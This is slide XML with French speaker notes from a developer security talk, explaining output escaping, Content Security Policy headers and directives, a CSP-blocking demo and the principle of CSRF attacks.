              <a:t>jsp : mise à disposition d’une fonction escapeXml ${fn:escapeXml(param.foo)}</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r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Tout ça pour dire que les librairies et framework sont outillés pour se prémunir des XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>La dernière barrière contre les XSS s’appelle CSP pour Content Security Policy. Elle est assez récente puisque elle est en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Candidate Recommendation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> depuis novembre 2012</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38000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Content Security Policy est un mécanisme de sécurité permettant de restreindre l'origine du contenu (tel qu'un script Javascript, une feuille de style etc.) dans une page web à certains sites autorisés. Cela signifie qu’en tant que développeur, je peux dire en temps au navigateur : tu as le droit de télécharger et d’exécuter des scripts provenant de mon site et de google analytics.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Pour cela, le serveur envoie un header HTTP que le navigateur interprète. Les navigateurs ne supportant cette spécification ignorent simplement l'en-tête, cela est donc transparent pour le visiteur. Mais la protection n’est donc pas active.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Le header se nomme :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour firefox, chrome, safari</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Content-Security-Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour IE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>CSP arrive avec un ensemble de directive pour chaque type d’asset. Par défaut, si une directive n’est pas renseignée, cela signifie que tous est autorisé. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La valeur de chaque directive est flexible :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un schéma : data, https, http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un nom host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une URI complète (scheme + host + port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les wilcards sont acceptés dans les schemes, les ports et la partie gauche des noms de domaines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>youtube.fr =&gt; matche tous les scheme (http / https), tous les ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*.newrelic.com =&gt; matche tous les scheme (http / https), tous les ports et tous les sous domaines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.dailymotion.fr:443 =&gt; matche que le https sur le port 443 du nom de domaine www.dailymotion.fr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="7340600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="120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38000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lorsqu’une policy est violée, le feedback est présent dans la console en rouge. Sur le premier screenshot on voit qu’une image provenant de criteo a été bloquée car elle ne respecte pas la policy “img-src”. Cette dernière n’autorise le chargement des images qu’à partir du site courant (localhost dans mon cas)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il est également possible de configurer le navigateur pour envoyer les informations nécessaires au déboggage via la directive “report-uri”. Dans ce cas, en plus de logguer dans la console, le navigateur poste les données relatives à la violation sur l’url configurée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 - afficher la page ayant le commentaire malveillant avec le paramètre ?csp=true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 - voir dans la console l’appel bloqué</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 - voir dans la partie réseau le post sur l’url de reporting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SzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pourquoi parler de sécurité aujourd’hui ? Tout simplement pour vous sensibiliser à la sécurité. On peut dire que sur projets sur lesquels je suis passé, le but premier des équipes est d’apporter de la valeur métier en livrant des nouvelles fonctionnalités. Ce qui est tout à fait louable et normal. Cependant, cela se fait souvent au détriment de la sécurité. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soit par manque de temps et de budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soit c’est en partie assumé parce qu’on se dit qu’il y aura des audit de sécurité qui rattraperons le tir, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soit que la sécurité n’est pas une demande explicite du client, du coup on s’en préoccupe pas. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soit d’autre fois, c’est par simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>méconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le but de cette présentation est de susciter votre curiosité sur certaines failles les plus courantes en vous montrant comment les exploiter et bien entendu comment s’en protéger.</a:t>
            </a:r>
          </a:p>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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Voici une vue qui devrait parler à tout le monde : le site caniuse.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Tous les navigateurs actuels supportent CSP. IE 10 et 11 sont d’une autre couleur car ils supportent le CSP mais avec un header spécifique : X-Content-Security-Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Pour rappel, les navigateur ne supportant pas supportant le CSP ignorent simplement l'en-tête, cela est donc transparent pour le visiteur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>En activant le CSP la taille des headers peut augmenter considérablement en fonction du nombre d'éléments de la liste des hôtes de confiance. P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>our l'anecdote, sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> un projet, cette taille avait atteint le poids est provoquait des erreurs sur le nginx frontal. Nous avons corrigé en augmentant la taille des buffers nginx.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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44000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un autre moyen (comme le XSS) de faire executer des actions sans le consentement de l’utilisateur c’est le CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="144000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="144000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le principe d'une attaque de type CS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200"/>
              <a:t>RF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (pour les anglophones) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200"/>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de transmettre à un utilisateur vulnérable (tel qu’Alice) une requête HTTP falsifiée :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requête acceptable d’un point de vu applicatif cad qu’elle va pointer sur une action interne au site mais elle va comporter des paramètre spécifiques qui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peuvent corrompre les données du site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="144000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
